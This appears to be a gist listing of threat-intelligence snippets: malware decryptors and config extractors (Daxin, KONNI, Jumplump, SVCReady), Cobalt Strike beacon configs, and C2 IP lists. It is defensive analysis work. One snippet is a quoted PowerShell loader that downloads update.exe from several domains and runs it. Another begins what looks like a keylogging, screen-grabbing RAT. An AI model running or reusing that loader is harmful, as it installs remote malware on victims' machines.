usualsuspect

#!/usr/bin/env python3
# Cobalt Strike Malleable C2 instruction parser
import struct
import sys

def read_int(f):
    data = f.read(4)
    if not data:
        return None
    return struct.unpack(">I",data)[0]

usualsuspect

81.0.236.93:443
94.177.248.64:443
66.42.55.5:7080
103.8.26.103:8080
185.184.25.237:8080
45.76.176.10:8080
188.93.125.116:8080
103.8.26.102:8080
178.79.147.66:8080
58.227.42.236:80

usualsuspect

#!/usr/bin/env python3

#
#   Algorithm used by Daxin to decrypt embedded driver
#   Uses slightly modified RC4 (see comment in rc4() below)
#
#   Constants fitting for sample
#   b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427
#

usualsuspect

$ErrorActionPreference='SilentlyContinue';@("https://web.sunvn.net","https://taisunwin.club","https://web.sunwinvn.vip","http://b29.bet","https://playgo88.fun","https://choigo88.us")|%{$http=[System.Net.WebRequest]::Create("$_/SoftwareUpdate.exe").GetResponse();if($http.ContentLength -ne -1){(New-Object System.Net.WebClient).DownloadFile("$_/update.exe","$env:temp\update.exe");Start-Process -Filepath "$env:temp\update.exe"};$http.close()}

usualsuspect

BeaconType                       - Hybrid HTTP DNS
Port                             - 1
SleepTime                        - 3787
MaxGetSize                       - 1864474
Jitter                           - 59
MaxDNS                           - 255
PublicKey_MD5                    - 832667e06ab05f34cef55ad209504a2b
C2Server                         - ns1.standwithukraine.space,/jp,dns.standwithukraine.space,/jp,ns1.costacancordia.com,/jp,dns.costacancordia.com,/jp
UserAgent                        - Not Found
HttpPostUri                      - Not Found

usualsuspect

BeaconType                       - HTTPS
Port                             - 443
SleepTime                        - 53605
MaxGetSize                       - 1398447
Jitter                           - 63
MaxDNS                           - Not Found
PublicKey_MD5                    - d625126bd4d7cf421d2d001fc29c7ce2
C2Server                         - 190.123.44.220,/thaw.txt
UserAgent                        - Mozilla/5.0 (Linux; Android 9; ONEPLUS A3003) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.74 Mobile Safari/537.36
HttpPostUri                      - /shorten

usualsuspect

#!/usr/bin/env python3

#
#   Author: @jaydinbas
#
#   Extract xor-encrypted archives from docx files as used by 
#   RemoteDllLoader in SVCReady execution chains
#

import sys

usualsuspect

#!/usr/bin/env python3
#
#   Author: @jaydinbas
#
#   Extract config from Knotweed Jumplump samples
#   Note: Not all samples tagged as 'Jumplump' in the MS report
#         contain a config, some just load other samples that do
#
#   Works for
#       cbae79f66f724e0fe1705d6b5db3cc8a4e89f6bdf4c37004aa1d45eeab26e84b

usualsuspect

import subprocess, socketio
from enum import Enum
import requests
from time import sleep
from PIL import ImageGrab
import os
from datetime import datetime, timedelta
from pynput.keyboard import Listener
allowed_methods = {
 'get','post','put','options','delete','patch','head'}

usualsuspect

#!/usr/bin/env python3

#
# Author: @jaydinbas
#
# Decrypt string blobs and files used by KONNI malware
#
# Reference sample: 158f5228225d9337083c323b45a63e70297ed9c8ecb8517dc1d8cb64f29acf5d
# via https://twitter.com/ShadowChasing1/status/1568064494982823937
#